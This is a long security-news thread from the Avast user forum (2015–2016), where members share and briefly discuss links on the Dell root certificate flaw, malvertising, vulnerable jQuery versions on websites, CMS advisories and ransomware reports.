Also AVAST Software a.s. certificate is being dropped as "Untrusted Certificate". It puts Google Chrome in silent “superpower” policy mode, together with opening a whole range of attack vectors. This adware has certainly stepped the line for us and could be termed as "a malcoded pest".
polonus
-
Vonteera Adware Uses Certificates to Disable Anti-Malware
https://blog.malwarebytes.org/security-threat/2015/11/vonteera-adware-uses-certificates-to-disable-anti-malware/?utm_source=Gplus&utm_medium=sociala
Catching Up With The ‘EITest’ Compromise, A Year Later
https://blog.malwarebytes.org/hacking-2/2015/11/catching-up-with-the-eitest-compromise-a-year-later/?utm_source=Gplus&utm_medium=social
-
Test for the bad dell certificate here: https://edell.tlsfun.de/
pol
-
Test for the bad dell certificate here: https://edell.tlsfun.de/ (https://edell.tlsfun.de/)
pol
I have a Dell Inspiron 17 5000 Series.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1448320057823-95326.png)
So why is this coming up clean and why is he recommending changing over to Linux ???
-
You do not have to worry, dear bob3160, when yours would have been ill-flagged,
you would have seen this: https://twitter.com/markloman/status/668842464913006592
It says at the bottom: Alternatively you can install Linux and delete Windows.
This is not what you should do, and maybe only someone like FreeWheelinFrank would advise such a measure,
as he is a Linux fan ;) So do not hold this against me, I did not make up that "edellweiss" root certificate test :D
At least -midnight felt rather relieved her Dell machine came up clean. ;D
Damian
-
You do not have to worry, dear bob3160, when yours would have been ill-flagged,
you would have seen this: https://twitter.com/markloman/status/668842464913006592 (https://twitter.com/markloman/status/668842464913006592)
It says at the bottom: Alternatively you can install Linux and delete Windows.
This is not what you should do, and maybe only someone like FreeWheelinFrank would advise such a measure,
as he is a Linux fan ;) So do not hold this against me, I did not make up that "edellweiss" root certificate test :D
At least -midnight felt rather relieved her Dell machine came up clean. ;D
Damian
Sounds like someone with an alternate agenda did. :o
-
Instructions for all those that may have the dangerous Dell certificate of how to get rid of it:
https://dellupdater.dell.com/Downloads/APP009/eDellRootCertRemovalInstructions.docx
All new systems out will come without it now, according to Dell.
polonus
-
Partners in Crime delivered FUD scan services to go under the anti-virus radar....
http://www.nationalcrimeagency.gov.uk/news/749-cyber-crime-partnership-results-in-two-arrests
P.S. FUD stands for Fully Un Detectable....
pol
-
At least some Dell laptops are shipping with a trusted root certificate authority pre-installed, something that those who discovered the CA are comparing to the Superfish adware installed on Lenovo machines that left them open to man-in the-middle attacks.
“Note: Dell created their #eDellRoot certificate six months after Lenovo's Superfish scandal hit the news. No lessons learned.”
http://www.networkworld.com/article/3007811/security/dell-computers-shipping-with-potentially-dangerous-root-certificate-authority.html
-
More dell sloppiness: http://www.laptopmag.com/articles/dell-certificate-security-flaw
Read: The root CA cert has the name "DSDTestProvider" -> http://www.kb.cert.org/vuls/id/925497
polonus
-
Reckon 'the alledged backdoor talks with industry" we hear about, were somehow rather successful, and once in a while we stumble on one or two. We gonna hear more of this...
polonus
-
On many, many, many scans for vulnerable website code I come across this library that should be retired, because vulnerable.
It is jquery - 1.7.1 : (active1) -https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
See why here: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Also read here about jQuery security over https: http://security.stackexchange.com/questions/11278/javascript-and-jquery-not-secure-over-https
polonus
-
Here some reasons why one should let Google host your jQuery for you: http://encosia.com/3-reasons-why-you-should-let-google-host-jquery-for-you/ link article author = Dave Ward.
A list of vulnerable jQuery Versions: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Test: http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003
This is no guarantee however as the link site given above has a vulnerable library itself as analyzed this was:
-http://encosia.com/
Detected libraries:
jquery - 1.9.1 : -http://encosia.com/blog/wp-content/themes/encosia/js/vendor/jquery-1.9.1.min.js
jquery - 1.11.3 : (active1) -http://encosia.com/
jquery-migrate - 1.2.1 : -http://encosia.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=b2ee832f4b422db251d428d07d4b1c67
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected Word Press configuration at mentioned site seems OK.
I check sites with Detect jQuery
// @namespace http://www.top-info.de/thein
// @description Detect jQuery on every page
This runs in Google Chrome via tampermonkey extention!
Appspector extension also give this info for every page you visit.
polonus
-
Google at it again: http://www.theguardian.com/technology/2015/nov/25/google-bug-buries-yelp-tripadvisor-search
Google claims it is a bug, but an effective one for the monopolist ;)
polonus
-
Video Ads: Malvertising’s Next Frontier?
https://blog.malwarebytes.org/malvertising-2/2015/11/video-ads-malvertisings-next-frontier/?utm_source=Gplus&utm_medium=sociala
The Road to Black Friday: Stats and Security Tips
https://blog.malwarebytes.org/security-threat/2015/11/the-road-to-black-friday-stats-and-security-tips/?utm_source=Gplus&utm_medium=social
A Week in Security (Nov 15 – Nov 21)
https://blog.malwarebytes.org/online-security/2015/11/a-week-in-security-nov-15-nov-21/?utm_source=gplus&utm_medium=social
-
The Internet of Things bad, bad security situation: http://www.theregister.co.uk/2015/11/26/lazy_iot_skeleton_keys/
link article author = Shaun Nichols
Yes folks, it is much worse than we thought it was or did we already expect it to be bad ;)
Infosec biz Sec Consult says it studied 4,000 embedded devices from 70 hardware makers, and found that many products are sharing the same hardwired SSH login keys and server-side SSL certificates. Hack one and you will/may hack many...
polonus
-
More than 26,000 Cisco devices sold by Australia's dominant telco Telstra are open to hijacking via hardcoded SSH login keys and SSL certificates. Re: http://www.theregister.co.uk/2015/11/27/nine_percent_of_encrypted_traffic_open_to_hijack_from_shared_keys/
Million others may be also vulnerable: There are no patches or workarounds available for the security blunder, which potentially affect millions of users. One workaround would be to ensure the SSH and HTTPS configuration servers in the routers are firewalled off from harm.
polonus
-
Steam’s “Exploration Sale” Gamifies Security Settings
https://blog.malwarebytes.org/online-security/2015/11/steams-exploration-sale-gamifies-security-settings/?utm_source=Gplus&utm_medium=social
-
Adobe Is Telling People to Stop Using Flash (http://recode.net/2015/12/01/adobe-is-telling-people-to-stop-using-flash/)
-
Microsoft Security Advisory 3119884 - Inadvertently Disclosed Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/3119884.aspx
-
Return of the old vundo malware: http://blog.fox-it.com/2015/12/02/ponmocup-a-giant-hiding-in-the-shadows/
polonus
-
I have a personal website that Avast will not let me go to,"it says it might harm my computer"
This is not a bad/dangerous site at all. The confusing thing to me is that I dont have Avast installed on my computer. Whats going on?
-
I have a personal website that Avast will not let me go to,"it says it might harm my computer"
This is not a bad/dangerous site at all. The confusing thing to me is that I dont have Avast installed on my computer. Whats going on?
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
-
FrameFox: Nominated for the Most Aggressive EULA
https://blog.malwarebytes.org/security-threat/2015/11/framefox-nominated-for-the-most-aggressive-eula/?utm_source=Gplus&utm_medium=social
Lesson...read the EULA every time you install any software/
[bLarge Number of Adult Sites Distribute Malware Via AdXpansion Malvertising][/b]
https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/?utm_source=Gplus&utm_medium=social
A solid ad blocker like Adguard AdBlocker and Ghostery are a must anymore.
-
For most people life is to short to read every EULA and that is what most companies hope for.
I used to have a little program EULA Analyser that broke down the EULA into easily understood plain English (not legalese) terms.
-
If I read every EULA, I would never install anything on my computer.
I might actually never buy a computer..... :)
The program David mentioned is probably this one:
http://www.brightfort.com/eulalyzer.html (http://www.brightfort.com/eulalyzer.html)
-
Hi bob3160,
As you know what to expect there is no need for it ;)
polonus
-
If I read every EULA, I would never install anything on my computer.
I might actually never buy a computer..... :)
The program David mentioned is probably this one:
http://www.brightfort.com/eulalyzer.html (http://www.brightfort.com/eulalyzer.html)
Yes, that's the one, a real handy tool.
-
For most people life is to short to read every EULA and that is what most companies hope for.
Speaking of which (https://forum.avast.com/index.php?topic=85679.msg1273108#msg1273108)
-
Hundreds of pr0n-sites source of malicious ads: https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/
polonus
-
Hundreds of pr0n-sites source of malicious ads: https://blog.malwarebytes.org/malvertising-2/2015/12/large-number-of-adult-sites-distribute-malware-via-adxpansion-malvertising/
polonus
Polonus, do you have any info about this kind of malware that could be converted into a blog article?
-
Hi Lisandro,
When it goes into a blog article warn about the nature of the adxpansion threat e.g. explicit adult content.
This is not suitable info for minors!
Besides this has been all over the news at MBAM forum and other places,
so what would be the additional avast blog content value?
But here then is the story in a nutshell and understandable for a greater user base.
It all comes down to cybercriminal fraudulent adxpansion abuse.
Read here: https://www.mywot.com/en/scorecard/adxpansion.com?utm_source=addon&utm_content=popup
This is classified as a 34% high risk site. The malicious manipulation of the ads is not done by the parties that buy ads, but by third parties that manipulate.
We see high risk vulnerabilities here. It is a known Flash ad/exploit attack scheme as this technique simply relies on a disguised Flash advert that downloads its own exploit and payload. The traffic for ads it seeks to malcreate runs in the millions of clicks... So disabling or uninstall Flash or enable it on demand only could help protect.
Like DirectRev Malvertising this Uses Self Sufficient Flash 0Day.
The ad is booby-trapped such that it silently loads an external URL
and that is not a direct no-no in unethical ad-serving for the adlaunching industry, so can be abused easily.
See observed sub-domains: https://www.virustotal.com/nl/domain/adxpansion.com/information/
This site for instance that was used in the hack was earlier hacked and compromised, so found to be vulnerable
-malenkiyprince dot ru
re: -http://malenkiyprince.otel-v-krimu.ru/aan.txt
The Flash exploit used was described here: http://malware.dontneedcoffee.com/2015/10/cve-2015-7645.html
Here it was not detected and this should be so under normal instances: http://www.stwhisper.com/www.malenkiyprince.ru
More on this malcode issue here: http://avpclub.alone.tw/discuz/redirect.php?tid=53748&goto=lastpost
So now you see how devious this is and why an adult user should never go on to the Internet without a decent adblocker and an good script blocker,
polonus (volunteer website security analyst and website error-hunter)
-
“INTUIT Security Warning” Emails Lead to Fake Browser Update Malware
https://blog.malwarebytes.org/security-threat/2015/12/intuit-security-warning-emails-lead-to-fake-browser-update-malware/?utm_source=Gplus&utm_medium=social
-
Adobe Flash Player Update: Say Hello to New 'Adobe Animate CC
http://www.latinpost.com/articles/99836/20151204/adobe-flash-player-update-hello-new-animate-cc.htm
-
Kicking in an open door here: http://www.darkreading.com/vulnerabilities---threats/the-programming-languages-that-spawn-the-most-software-vulnerabilities/d/d-id/1323397?
PHP, ASP Web scripting languages breed more vulnerabilities than Java, .NET programming platforms, Veracode's new state of software security report says.
And it still is very much the truth: Chris Wysopal: "When I see a breach, one of the things that sticks out in my head is 'I'll bet that was a PHP site.'"
polonus (volunteer website security analyst and website error-hunter)
-
Steer Clear of Movie Spam Subreddits
https://blog.malwarebytes.org/online-security/2015/12/steer-clear-of-movie-spam-subreddits/?utm_source=Gplus&utm_medium=social
-
OpenSSL Security Advisory [3 Dec 2015]
http://openssl.org/news/secadv/20151203.txt
-
Malvertising returns to DailyMotion again: https://blog.malwarebytes.org/malvertising-2/2015/12/malvertising-hits-dailymotion-serves-up-angler-ek/
The fake traffic schemes that are rotting your Internet: http://www.bloomberg.com/features/2015-click-fraud/
pol
-
Spy-malware researchers life became threatened by malcreant(s): https://citizenlab.org/2015/12/packrat-report/
polonus
-
Found this just wo days old Malwarebytes blogpost about Dailymotion malvertising: https://blog.malwarebytes.org/malvertising-2/2015/12/malvertising-hits-dailymotion-serves-up-angler-ek/
Hope that adblockers are enough to protect casual users from these kind of things. :-\
-
Hi Pernaman,
On the other hand the leaking of private data goes on for instance Dutch medical websites and Dutch hospital websites. These sites will leak user health information to commercial third parties. Data-services like AddThis and ShareThis are known to create such user tracking profiles for visitor webhistory, search queries, etc. Trackers were only removed after Dutch TV journalists had asked questions. So a decent adtrack-blocker is a tool we cannot go without for our own good...
polonus
-
The Independent WP Blog (was) spreading Ransomware malware: http://blog.trendmicro.com/trendlabs-security-intelligence/blog-of-news-site-the-independent-hacked-leads-to-teslacrypto-ransomware/
polonus
-
Microsoft Security Bulletin Summary for December 2015
https://technet.microsoft.com/en-us/library/security/ms15-dec.aspx
-
Yandex acquires software developer Agnitum
http://www.telecompaper.com/news/yandex-acquires-software-developer-agnitum--1117968
-
Comodore never die ;)
A 1980s Commodore PC has controlled this school district's A/C for 30 years
http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/?fb=ss&prtnr=wired
-
Comodore never die ;)
A 1980s Commodore PC has controlled this school district's A/C for 30 years
http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/?fb=ss&prtnr=wired (http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/?fb=ss&prtnr=wired)
They just don't make things like they used to. I still have a working Commodore Vic 20. :)
-
Data Dissonance: Tunecore Breached
https://blog.malwarebytes.org/online-security/2015/12/data-dissonance-tunecore-breached/?utm_source=linkedin&utm_medium=socialIf
Malware Targeting Steam Traders Banks on New Escrow System
https://blog.malwarebytes.org/online-security/2015/12/malware-targeting-steam-traders-banks-on-new-escrow-system/?utm_source=Gplus&utm_medium=social
-
Inside Chimera Ransomware – the first ‘doxingware’ in wild
https://blog.malwarebytes.org/intelligence/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/
-
Microsoft ends support for .Net Framework 4, 4.5 and 4.5.1
http://www.ghacks.net/2015/12/10/microsoft-ends-support-for-net-framework-4-4-5-and-4-5-1/
-
10% of Google chrome users infested with unwanted software: https://googleonlinesecurity.blogspot.nl/2015/12/year-one-progress-in-fight-against.html link article authors: Moheeb Abu Rajab, Google Security Team.
polonus
-
10% of Google chrome users infested with unwanted software: https://googleonlinesecurity.blogspot.nl/2015/12/year-one-progress-in-fight-against.html (https://googleonlinesecurity.blogspot.nl/2015/12/year-one-progress-in-fight-against.html) link article authors: Moheeb Abu Rajab, Google Security Team.
polonus
Some help for this is Unchecky (http://unchecky.com/). More importantly is learning to use the custom install option. :)
-
Vulnerability in Java Deserialization Affecting Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization
-
Vulnerability in Java Deserialization Affecting Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization
Meaning only when JRE is enabled, or even when it's not since there's Java components in Cisco's tools?
-
You’re so predictable: the AV vulnerability that bypasses mitigations
http://blog.ensilo.com/the-av-vulnerability-that-bypasses-mitigations
-
WordPress hoster hacked, data breach, see: https://wpengine.com/support/infosec/
As I said by many occasions WP has a lot of security issues, like oudated versions used, outdated or left plug-ins,
this was found on that site we discuss here: ditty-news-ticker latest release (2.0.4)
http://dittynewsticker.com/
Not at this site but often for WP sites User Enumeration and Directory Indexing is enabled, a dangerous security misconfiguration!
The hacked website in question also had jQuery libraries that should come retired asap:
Detected libraries:
jquery - 1.8.3 : -https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery-ui-dialog - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
Info: Severity: medium
http://bugs.jqueryui.com/ticket/6016
jquery-ui-autocomplete - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
jquery-ui-tooltip - 1.9.2 : -https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js
Info: Severity: high
http://bugs.jqueryui.com/ticket/8859
jquery - 1.6.4 : -https://cdn.optimizely.com/js/836340079.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
4 vulnerable libraries detected
And that at a hosting website where users go to find security they can trust :o
polonus (volunteer website security analyst and website error-hunter)
-
Avoid this Lloyds Bank Phish Attempt
https://blog.malwarebytes.org/fraud-scam/2015/12/avoid-this-lloyds-bank-phish-attempt/?utm_source=Gplus&utm_medium=social
Spike in Malvertising Attacks Via Nuclear EK Pushes Ransomware
https://blog.malwarebytes.org/malvertising-2/2015/12/spike-in-malvertising-attacks-via-nuclear-ek-pushes-ransomware/?utm_source=gplus&utm_medium=social
-
Lenovo Security Advisory: LEN-4326
https://support.lenovo.com/product_security/len_4326
-
Lenovo Security Advisory: LEN-4326
https://support.lenovo.com/product_security/len_4326
Wow Lenovo are certainly getting a hammering on security of late.
-
Google to block a Symantec root certificate
Over the course of the coming weeks, Google will be moving to distrust the “Class 3 Public Primary CA” root certificate operated by Symantec Corporation, across Chrome, Android, and Google products. We are taking this action in response to a notification by Symantec Corporation that, as of December 1, 2015, Symantec has decided that this root will no longer comply with the CA/Browser Forum’s Baseline Requirements. As these requirements reflect industry best practice and are the foundation for publicly trusted certificates, the failure to comply with these represents an unacceptable risk to users of Google products.
taken from: https://googleonlinesecurity.blogspot.nl/2015/12/proactive-measures-in-digital.html
pol
-
Linksys routers vulnerable through CGI Scripts: https://www.korelogic.com/Resources/Advisories/KL-001-2015-006.txt
polonus
-
Joomla! [20151201] - Core - Remote Code Execution Vulnerability
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
-> https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
-
Hi Asyn, and it is already being actively abused, according to Sucuri's: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html Apply the hotfixes everybody, secure yourselves and your visitors: https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
polonus (volunteer website security analyst and website error-hunter)
-
Comcast Customers Targeted In Elaborate Malvertising Attack
https://blog.malwarebytes.org/malvertising-2/2015/12/comcast-customers-targeted-in-elaborate-malvertising-attack/?utm_source=Gplus&utm_medium=social
-
Gigantic botnet attacked Internet backbone's DNS-rootservers twice: http://arstechnica.com/security/2015/12/attack-flooded-internet-root-servers-with-5-million-queries-a-second/
polonus
-
“Steam VAC Remover” Leads to Mobile Offers
https://blog.malwarebytes.org/online-security/2015/12/steam-vac-remover-leads-to-mobile-offers/?utm_source=Gplus&utm_medium=social
More Replica Automated Mails Lead to Fake Pharma
https://blog.malwarebytes.org/fraud-scam/2015/12/more-replica-automated-mails-lead-to-fake-pharma/?utm_source=Gplus&utm_medium=social
Massive MacKeeper data breach
https://blog.malwarebytes.org/mac/2015/12/massive-mackeeper-data-breach/?utm_source=Gplus&utm_medium=social
Why layered security is important (Common sense approach most forum members practice.)
https://www.malwarebytes.org/articles/why-layered-security-is-important/?utm_source=Gplus&utm_medium=social
-
For cybercriminal nothing is sacred: https://www.proofpoint.com/us/threat-insight/post/Risky-Mobile-Apps-Steal-Data
polonus
-
Gigantic botnet attacked Internet backbone's DNS-rootservers twice: http://arstechnica.com/security/2015/12/attack-flooded-internet-root-servers-with-5-million-queries-a-second/
polonus
http://www.msn.com/en-us/news/technology/are-isis-hackers-trying-to-destroy-the-internet/ar-BBnEEQy?li=BBnb7Kz (http://www.msn.com/en-us/news/technology/are-isis-hackers-trying-to-destroy-the-internet/ar-BBnEEQy?li=BBnb7Kz)
-
Comcast Customers Targeted In Elaborate Malvertising Attack
https://blog.malwarebytes.org/malvertising-2/2015/12/comcast-customers-targeted-in-elaborate-malvertising-attack/?utm_source=Gplus&utm_medium=social
Use of an ad-blocker add-on or extension would block step 3 in attack scenario:
-
All other institutions declined to comment: https://theintercept.com/surveillance-catalogue/
The Department of Justice, however, argued that all use of such devices are “consistent with the requirements and protections of the Constitution, including the Fourth Amendment, and applicable statutory authorities.”
polonus
-
May the force, but not the malware, be with you!
https://blog.avast.com/2015/12/17/may-the-force-but-not-the-malware-be-with-you/
-
Not Happy Or Healthy:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1450442832871-72676.png)
If you get this please put it where it belongs - In The TRASH
-
Hack Into a Linux Computer by Hitting the Backspace 28 Times
http://motherboard.vice.com/read/hack-into-a-linux-computer-by-hitting-the-backspace-28-times
-
PUPs Masquerade as Installer for Antivirus and Anti-Adware
https://blog.malwarebytes.org/online-security/2015/12/pups-masquerade-as-installer-for-antivirus-and-anti-adware/?utm_source=Gplus&utm_medium=social
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not leave a chance pass to be able to cooperate to better be able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise or often have their hands bound on their backs by ignoring and restrictive management. Even some cold reconnaissance scannings of sorts could get them into problems if they haven't achieved explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand where the dark forces always will have the better of us all.
polonus (volunteer website security analyst and website error hunter)
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not leave a chance pass to be able to cooperate to better be able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise or often have their hands bound on their backs by ignoring and restrictive management. Even some cold reconnaissance scannings of sorts could get them into problems if they haven't achieved explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand where the dark forces always will have the better of us all.
polonus (volunteer website security analyst and website error hunter)
Pretty good Avast: http://www.dnsinspect.com/avast.com/1450698276
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/ (http://www.dnsinspect.com/)
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not leave a chance pass to be able to cooperate to better be able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise or often have their hands bound on their backs by ignoring and restrictive management. Even some cold reconnaissance scannings of sorts could get them into problems if they haven't achieved explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand where the dark forces always will have the better of us all.
polonus (volunteer website security analyst and website error hunter)
Pretty good Avast: http://www.dnsinspect.com/avast.com/1450698276 (http://www.dnsinspect.com/avast.com/1450698276)
Getting a good report is pretty easy. :)
http://www.dnsinspect.com/bob3160.com/1450705872
-
Website Status 451, website cannot be visited because legally restricted. When the code is not shown it could be government censorship that one tries to hide (policor (social) media censorship etc. etc.) Another issue to reckon with on the free Interwebs.
Read about this new http statuscode: https://datatracker.ietf.org/doc/draft-ietf-httpbis-legally-restricted-status/
Why it was brought in, read: https://www.mnot.net/blog/2015/12/18/451
polonus
-
Consumers should act against Big Data Slurpers: https://www.enisa.europa.eu/activities/identity-and-trust/library/deliverables/big-data-protection/at_download/fullReport = ENISA's good practice in information security report.
Big Data Analytics means a big privacy risk. Only after Big Data Breaches anyone stirs a finger or rather all goes on as usual.
The general public is not aware of the privacy risks involved while growing dependant on using this Big Data Slurping Tools like PSM services. (Private Social Media, a contradictio in terminis).
polonus
-
Some would not like such a policy and/or rather choose another vendor: http://www.ctvnews.ca/business/blackberry-ceo-it-s-a-social-responsibility-to-give-police-data-in-some-cases-1.2707179
polonus
-
Joomla! - [20151206] - Core - Session Hardening
https://developer.joomla.org/security-centre/639-20151206-core-session-hardening.html
-> https://www.joomla.org/announcements/release-news/5643-joomla-3-4-7.html
-
Some would not like such a policy and/or rather choose another vendor: http://www.ctvnews.ca/business/blackberry-ceo-it-s-a-social-responsibility-to-give-police-data-in-some-cases-1.2707179 (http://www.ctvnews.ca/business/blackberry-ceo-it-s-a-social-responsibility-to-give-police-data-in-some-cases-1.2707179)
polonus
No at any cost isn't always the wises choice. Yes without a just cause is just as incorrect. (IMHO)
-
Hi bob3160,
Well software management cannot take the seat of a judge, as a software vendor cannot discriminate until a subject has been found guilty.
So who is to decide here that the police should get such data and on what grounds? You cannot take the law into their own hands.
Well at least not in Europe. Well and it also will backfire, a vendor that starts to do these kind of things will be left with no unique selling point left.
polonus
-
Just like Google now Yahoo also to use users of suspected state-sponsored actor's attack:
https://yahoo-security.tumblr.com/post/135674131435/notifying-our-users-of-attacks-by-suspected
polonus
-
Angler EK Drops TeslaCrypt Via Recent Flash Exploit
https://blog.malwarebytes.org/exploits-2/2015/12/angler-ek-drops-ransomware-newexploit/?utm_source=gplus&utm_medium=social
HSBC Phish: “Your account is currently locked!”
https://blog.malwarebytes.org/fraud-scam/2015/12/hsbc-phish-your-account-is-currently-locked/?utm_source=gplus&utm_medium=social
-
Very agressive adware disbles safebrowsing: https://blog.malwarebytes.org/online-security/2015/12/mintcast-pups-disable-safebrowsing-settings-in-firefox/
pol
-
Kicking in of an open door sort of an existing correlation between botnet activity and file sharing activity : https://blog.bitsighttech.com/bitsight-insights-peer-to-peer-peril
pol
-
Hyatt Notifies Customers Of Malware Activity
http://newsroom.hyatt.com/news-releases?item=123450
-
How does anti-malware work?
https://www.malwarebytes.org/articles/how-does-anti-malware-work/?utm_source=gplus&utm_medium=social
THE TOP THREE ONLINE SECURITY MENACES YOU SHOULD WORRY ABOUT IN 2016
http://www.fastcompany.com/3054760/elasticity/the-top-three-online-security-menaces-you-should-worry-about-in-2016
Here's how to dispose, recycle or trade in your old laptop
http://mashable.com/2015/12/26/laptop-recycling/?utm_cid=mash-com-Tw-tech-link%23sd613jsnjlqd#Dp_QpwUmlqqu
-
Recently Bought a Windows Computer? Microsoft Probably Has Your Encryption Key
https://theintercept.com/2015/12/28/recently-bought-a-windows-computer-microsoft-probably-has-your-encryption-key/
-
AVG Web Tune Up Chrome extension (still) has serious security flaws: https://code.google.com/p/google-security-research/issues/detail?id=675
Security through obscurity does not help this time, Google Zero Project researchers are relentless.
pol
-
Angry malcreant: http://www.bleepingcomputer.com/forums/t/599368/radamant-ransomware-kit-support-topic-encrypts-files-to-rrk-rdm-extension/page-4#entry3895835
polonus
-
Good to see that the malcreants are pis**d at the successful efforts of the anti-malware authors. It probably says a lot about the character of the malcreant writing the code, or possibly script kids on copy and paste coders.
-
In TalkTalk aftermath, it's time for companies to pay higher price for breaches
http://www.zdnet.com/article/in-talktalk-aftermath-its-time-for-companies-to-pay-price-for-breaches/
Millions of Voter Records Posted, and Some Fear Hacker Field Day
http://www.nytimes.com/2015/12/31/us/politics/voting-records-released-privacy-concerns.html?src=twr&smid=tw-nytimes&smtyp=cur&_r=1
Safe Browsing Scam: From Amazon to Rackspace
https://blog.malwarebytes.org/fraud-scam/2015/12/safebrowsing-scam-from-amazon-to-rackspace/?utm_source=gplus&utm_medium=social
-
Virus Scanners endanger or kill security and safety of encrypted connections.
No TLS-proxy was found completely secure against attacks, see this research paper: https://madiba.encs.concordia.ca/~x_decarn/papers/tls-proxy-ndss2016.pdf
Anyone?
pol
-
Is this correct for Google to allow and isn't it controversional?
The Trump Filter, developed by Rob Spectre, blocks websites covering the front-runner and, according to the filter’s website, “makes America great again.”
“Eliminate Donald Trump from all your web browsing without leaving the Internet. Donald simply disappears from your view of every web page.”
According to Spectre, blocking news coverage of Donald Trump will “give concerned citizens the opportunity to actually focus on other candidates and learn about the issues.” Link: http://trumpfilter.com/
You cannot filter things away from reality because you rather wish to do so.
polonus
-
Drinking in excess also isn't good but makes you forget. :)
-
Or you just go silent on things: Microsoft failed to warn victims of Chinese email hack.
Read: http://www.reuters.com/article/us-microsoft-china-insight-idUSKBN0UE01Z20151231
polonus
-
Meet Ransom32: The first JavaScript ransomware
http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
Only 3(!) AVs detect this thing as im writing this.
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
-
Hi Steven Winderlich,
Interesting and a new task for the qualified removers here: http://www.bleepingcomputer.com/forums/t/554433/trojanwin32genericpakcobra/
Trojan.Win32.Generic.pak!cobra has great damaging power to completely mess up the system, so you should remove it as soon as possible as it can badly affect your data on the Server.
Damian
-
Most Destructive Malware of All Time
https://www.opswat.com/blog/most-destructive-malware-all-time
-
Hej Pondus,
I miss Virut mentioned there, as ever a virus was destructive, Virut was.
polonus
-
Yandex employee stole search engine source code, tried to sell it for just £19,000
http://arstechnica.co.uk/business/2015/12/yandex-employee-stole-search-engine-source-code-tried-to-sell-it-for-just-27000/
-
Meet Ransom32: The first JavaScript ransomware
http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
Only 3(!) AVs detect this thing as im writing this.
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
New variant maybe Rootkit!!!!!
https://www.hybrid-analysis.com/sample/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a?environmentId=1
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
-
Security Notification and Linode Manager Password Reset
http://status.linode.com/incidents/ghdlhfnfngnh
-
Facebook “Page Disabled” Phish Wants your Card Details
https://blog.malwarebytes.org/fraud-scam/2016/01/facebook-page-disabled-phish-wants-your-card-details/?utm_source=gplus&utm_medium=social
WebSearcher PUP applies Proxy Lockdown
https://blog.malwarebytes.org/security-threat/2016/01/websearcher-pup-applies-proxy-lockdown/?utm_source=Gplus&utm_medium=social
-
Microsoft pulling support for Internet Explorer 8, 9, 10
http://money.cnn.com/2016/01/06/technology/microsoft-internet-explorer-support/
-
Abused by cybercriminals: http://blog.trendmicro.com/trendlabs-security-intelligence/lets-encrypt-now-being-abused-by-malvertisers/
pol
-
Attackers can take over websites. 25% of websites run the WordPress CMS.
New WordPress hole, users should update asap:
https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Re commit: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
With WP all files are inside a public folder,
normally one should only have an index.php, a .htaccess file and CSS/JS/Images files in there.
polonus
-
